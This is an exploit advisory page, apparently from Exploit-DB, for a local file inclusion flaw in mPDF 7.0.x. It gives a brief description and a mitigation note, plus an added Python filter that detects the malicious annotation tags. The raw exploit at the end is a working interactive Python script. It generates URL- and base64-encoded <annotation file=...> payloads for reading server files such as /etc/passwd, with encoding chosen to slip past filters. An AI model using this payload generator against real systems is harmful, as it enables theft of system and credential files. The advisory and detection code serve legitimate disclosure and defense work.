Vendor: mPDF
By: Musyoka Ian
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 22
Product Name: mPDF
Affected Version From: mPDF 7.0.x
Affected Version To: mPDF 7.0.x
Patch Exists: YES
CPE: a:mpdf:mpdf:7.0.x
Platforms Tested: Ubuntu 20.04
2022

mPDF 7.0 – Local File Inclusion

mPDF 7.0.x is vulnerable to Local File Inclusion (LFI). An attacker can exploit it to read sensitive files from the server by sending a crafted payload that contains the name of the file to read. In the script below, the payload is an `<annotation>` tag whose `file` attribute names the target file. The payload can also be URL encoded or base64 encoded to bypass security filters.

Mitigation:

Always run the latest version of mPDF and do not use the vulnerable version. Also use security filters to keep malicious payloads from reaching the server.
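
One way to build the security filter mentioned above, as an added example that is not part of the original advisory or the exploit script: it flags HTML destined for mPDF that contains an `<annotation>` tag with a `file` attribute (the payload shape used by the script below), including its URL-encoded and base64-encoded forms. The function names and the decode-round limit are assumptions; it is defense in depth alongside upgrading.

```python
import base64
import re
from urllib.parse import unquote

# <annotation ...> tag with a file attribute: the shape of the payload on this page.
ANNOTATION_FILE_RE = re.compile(
    r"<\s*annotation\b[^>]*?\bfile\s*=\s*[\"']?([^\"'\s>]*)", re.IGNORECASE
)
MAX_DECODE_ROUNDS = 5  # assumption: upper bound on nested encoding layers


def decoded_layers(value):
    """Yield the input and every distinct URL-/base64-decoded form of it."""
    seen, queue = set(), [value]
    for _ in range(MAX_DECODE_ROUNDS):
        next_queue = []
        for item in queue:
            if item in seen:
                continue
            seen.add(item)
            yield item
            next_queue.append(unquote(item))
            try:
                raw = base64.b64decode(item.strip(), validate=True)
                next_queue.append(raw.decode("utf-8"))
            except ValueError:  # not base64, or not UTF-8 text
                pass
        queue = next_queue


def annotation_file_refs(html):
    """Return file paths referenced by <annotation file=...> in any layer."""
    refs = []
    for layer in decoded_layers(html):
        refs.extend(m.group(1) for m in ANNOTATION_FILE_RE.finditer(layer))
    return refs


if __name__ == "__main__":
    # Constructed sample input, not taken from a real request.
    sample = '<p>Invoice</p><annotation file="/etc/hostname" content="x" />'
    print(annotation_file_refs(sample))
```

Reject or log any request for which `annotation_file_refs` returns a non-empty list before the HTML is handed to mPDF.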

Exploit-DB raw data:

# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A

#!/usr/bin/env python3

from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode

class Terminal(Cmd):
    prompt = "\nFile >> "
    def default(self, args):
        payload_gen(args)

def banner():
    # Raw string: the ASCII art contains backslashes that are not valid escape sequences.
    banner = r"""                          _____  _____  ______   ______ ___  __   __                  _       _ _   
                         |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |  
               _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_ 
               | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|
               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_ 
               |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|
                                                                               | |                  
                                                                               |_|   """
    print(banner)
def payload_gen(fname):
    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
    encoded_payload = quote(payload)
    print("[+] Replace the content with the payload below")

    print(f"Url encoded payload:\n{encoded_payload}\n")
    base64enc = b64encode(encoded_payload.encode())
    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")

if __name__ == "__main__":
    banner()
    print("Enter Filename eg. /etc/passwd")
    terminal = Terminal()
    terminal.cmdloop()